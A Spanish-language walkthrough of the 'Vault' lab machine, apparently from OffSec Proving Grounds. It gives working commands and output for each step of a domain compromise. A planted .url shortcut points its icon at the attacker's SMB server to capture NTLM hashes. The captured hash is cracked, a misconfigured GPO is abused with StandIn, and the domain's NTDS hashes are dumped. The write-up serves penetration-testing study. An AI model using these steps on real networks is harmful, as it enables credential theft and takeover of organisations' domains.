Vault
Description
Para comprometer esta maquina tuve que usar un ataque del lado del cliente, crackear un hash NTLM y escalar privilegios abusando de una GPO mal configurada
Enumeration
Nmap
TCP
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-06-11 13:08:24Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open tcpwrapped
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: VAULT
| NetBIOS_Domain_Name: VAULT
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: vault.offsec
| DNS_Computer_Name: DC.vault.offsec
| DNS_Tree_Name: vault.offsec
| Product_Version: 10.0.17763
|_ System_Time: 2022-06-11T13:09:13+00:00
|_ssl-date: 2022-06-11T13:09:53+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC.vault.offsec
| Not valid before: 2022-06-10T12:36:02
|_Not valid after: 2022-12-10T12:36:02
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
49792/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
UDP
PORT STATE SERVICE
53/udp open domain
123/udp open ntp
User Own
En la enumeracion basica ví que podia listar recursos compartidos sin autenticarme
root@kali:~/PG/Vault/xpl# smbmap -H vault.offsec -u 'a' -p ''
[+] Guest session IP: vault.offsec:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DocumentsShare READ, WRITE
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
Mount ShareFolder
root@kali:~/PG/Vault/xpl# mkdir DocumentsShare
root@kali:~/PG/Vault/xpl# mount -t cifs //192.168.164.172/DocumentsShare DocumentsShare
Password for root@//192.168.164.172/DocumentsShare:
La carpeta DocumentsShare parece indicar que se comparten documentos ahi, por lo que entendi que necesitaba realizar un ataque del lado de cliente.
Probe a subir un docx con una macro maliciosa y no funcionó, por lo que la siguiente prueba fue con un ShortCut malicioso.
Evil ShortCut
[InternetShortcut]
URL=anything
WorkingDirectory=anything
IconFile=\\192.168.49.164\SERVER\%USERNAME%.icon
IconIndex=1
root@kali:~/PG/Vault/xpl/DocumentsShare# ls
@evil.url
Despues puse un python smbserver a escuchar y obtuve el hash NTLM de un usuario
root@kali:~/PG/Vault/xpl/DocumentsShare# impacket-smbserver -smb2support SERVER $(pwd)
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (192.168.164.172,49983)
[*] AUTHENTICATE_MESSAGE (VAULT\anirudh,DC)
[*] User DC\anirudh authenticated successfully
[*] anirudh::VAULT:aaaaaaaaaaaaaaaa:7190a23a8cccbc7007894e7266d447e0:010100000000000080881611817ed801cb91f44f5c76af15000000000100100056004c0071005a0057004d00410047000300100056004c0071005a0057004d004100470002001000470062006a00740070004b004400760004001000470062006a00740070004b00440076000700080080881611817ed801060004000200000008003000300000000000000001000000002000001b898dac5a5d0d98431ae6a160f57301d980dd48cbd559755dcd4af5be07242d0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340039002e003100360034000000000000000000
[*] Closing down connection (192.168.164.172,49983)
[*] Remaining connections []
El siguiente paso fue crackear el hash con JohnTheRipper
root@kali:~/PG/Vault/xpl# john --wordlist=/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
SecureHM (anirudh)
1g 0:00:00:06 DONE (2022-06-12 19:25) 0.1666g/s 1768Kp/s 1768Kc/s 1768KC/s Seifer1..Schs93
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Credentials
Con estas credenciales pude acceder a la maquina con Evil-WinRM
user: anirudh
pass: SecureHM
root@kali:~/PG/Vault/xpl# evil-winrm -i vault.offsec -u anirudh -p SecureHM
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\anirudh\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
Root Own
El usuario anirudh tiene los permisos SeBackupPrivilege y SeRestorePrivilege que son explotables, pero el path correcto para esta maquina es abusar de las GPO instaladas en la maquina. Para enumerar y explotar una politica vulnerable haremos lo siguiente:
check vuln GPO with PowerView
*Evil-WinRM* PS C:\Users\anirudh\Documents> . .\PowerView.ps1
*Evil-WinRM* PS C:\Users\anirudh\Documents> Get-NetGPO
usncreated : 5672
systemflags : -1946157056
displayname : Default Domain Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00
C04FB94F17}]
whenchanged : 6/12/2022 6:18:31 PM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 61512
dscorepropagationdata : {11/19/2021 9:00:32 AM, 11/19/2021 8:51:14 AM, 1/1/1601 12:00:00 AM}
name : {31B2F340-016D-11D2-945F-00C04FB984F9}
flags : 0
cn : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\vault.offsec\sysvol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedname : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
whencreated : 11/19/2021 8:50:33 AM
versionnumber : 5
instancetype : 4
objectguid : 93130581-3375-49c7-88d3-afdc915a9526
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vault,DC=offsec
usncreated : 5675
systemflags : -1946157056
displayname : Default Domain Controllers Policy
gpcmachineextensionnames : [{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 11/19/2021 8:50:33 AM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 5675
dscorepropagationdata : {11/19/2021 8:51:14 AM, 1/1/1601 12:00:00 AM}
name : {6AC1786C-016F-11D2-945F-00C04fB984F9}
flags : 0
cn : {6AC1786C-016F-11D2-945F-00C04fB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\vault.offsec\sysvol\vault.offsec\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
distinguishedname : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
whencreated : 11/19/2021 8:50:33 AM
versionnumber : 1
instancetype : 4
objectguid : 0ccc30ba-3bef-43ac-9c61-ebb814e9a685
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vault,DC=offsec
*Evil-WinRM* PS C:\Users\anirudh\Documents> Get-GPPermission -Guid 31B2F340-016D-11D2-945F-00C04FB984F9 -TargetType User -TargetName anirudh
Trustee : anirudh
TrusteeType : User
Permission : GpoEditDeleteModifySecurity
Inherited : False
Exploit with StanIn.exe
#Link
https://github.com/FuzzySecurity/StandIn
#Exploit
*Evil-WinRM* PS C:\Users\anirudh\Documents> .\standin --gpo --filter "Default Domain Policy" --localadmin anirudh
[?] Using DC : DC.vault.offsec
[+] GPO Object Found
Object : CN={31B2F340-016D-11D2-945F-00C04FB984F9}
Path : LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
GP Path : \\vault.offsec\sysvol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
[+] User Object Found
Object : CN=Anirudh
Path : LDAP://CN=Anirudh,CN=Users,DC=vault,DC=offsec
SID : S-1-5-21-537427935-490066102-1511301751-1103
[?] GPO Version
User : 0
Computer : 5
[+] Writing GPO changes
|_ Updating existing GptTmpl.inf
|_ Updating group membership
|_ User SID alread part of local admins..
*Evil-WinRM* PS C:\Users\anirudh\Documents> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
*Evil-WinRM* PS C:\Users\anirudh\Documents> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
anirudh
The command completed successfully.
Proof
*Evil-WinRM* PS C:\Users\anirudh\Desktop> type local.txt
0e3530c198fc63ff9087fa35796809b1
*Evil-WinRM* PS C:\Users\anirudh\Desktop> type c:\users\administrator\desktop\proof.txt
baba4609b5e82b2fbe8359e5b0b325ce
*Evil-WinRM* PS C:\Users\anirudh\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.164.172
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.164.254
Extra
Dump NTDS
root@kali:~/PG/Vault/xpl# crackmapexec smb vault.offsec -u anirudh -p SecureHM --ntds
SMB DC.vault.offsec 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:vault.offsec) (signing:True) (SMBv1:False)
SMB DC.vault.offsec 445 DC [+] vault.offsec\anirudh:SecureHM (Pwn3d!)
SMB DC.vault.offsec 445 DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB DC.vault.offsec 445 DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:54ff9c380cf1a80c23467ff51919146e:::
SMB DC.vault.offsec 445 DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB DC.vault.offsec 445 DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c660d4355b25d08a42130cb43d93418c:::
SMB DC.vault.offsec 445 DC anirudh:1103:aad3b435b51404eeaad3b435b51404ee:74c8075e8506407ebe49bb8de63f6057:::
SMB DC.vault.offsec 445 DC DC$:1000:aad3b435b51404eeaad3b435b51404ee:42179fa4b1ee593b9a72f3002cabc436:::
SMB DC.vault.offsec 445 DC Administrator:aes256-cts-hmac-sha1-96:bf23151dcf4df4d3f6dfd1839f84f67efdb34d4aeb1e8e21aeeed468e02d6204
SMB DC.vault.offsec 445 DC Administrator:aes128-cts-hmac-sha1-96:f627c58051156eda8beb5d911976d7f7
SMB DC.vault.offsec 445 DC Administrator:des-cbc-md5:f2d03b9b896eb073
SMB DC.vault.offsec 445 DC krbtgt:aes256-cts-hmac-sha1-96:1ece11d3d9fa652ff3b5f6cd519869df5b9782f66671225edec3f7937b5af67b
SMB DC.vault.offsec 445 DC krbtgt:aes128-cts-hmac-sha1-96:28e72f2babc6eaa4926d94bdeb7c4a0f
SMB DC.vault.offsec 445 DC krbtgt:des-cbc-md5:371fa46843c2f7f8
SMB DC.vault.offsec 445 DC anirudh:aes256-cts-hmac-sha1-96:de888f9a54f817c010f7162c137e6904b1a1e1a2315fde294125e3c0294e7137
SMB DC.vault.offsec 445 DC anirudh:aes128-cts-hmac-sha1-96:b29b9cb12534b8914b8b2caf060295ef
SMB DC.vault.offsec 445 DC anirudh:des-cbc-md5:eaf885b33e1fdf9e
SMB DC.vault.offsec 445 DC DC$:aes256-cts-hmac-sha1-96:439c298d444f1cc32a4c3841735124a423280a7323287b7951c0c6fd63c48513
SMB DC.vault.offsec 445 DC DC$:aes128-cts-hmac-sha1-96:5874daca58ed872a882205667d23d4f0
SMB DC.vault.offsec 445 DC DC$:des-cbc-md5:97e3f415a2cdb37a
SMB DC.vault.offsec 445 DC [+] Dumped 17 NTDS hashes to /root/.cme/logs/DC_DC.vault.offsec_2022-06-12_203912.ntds of which 4 were added to the database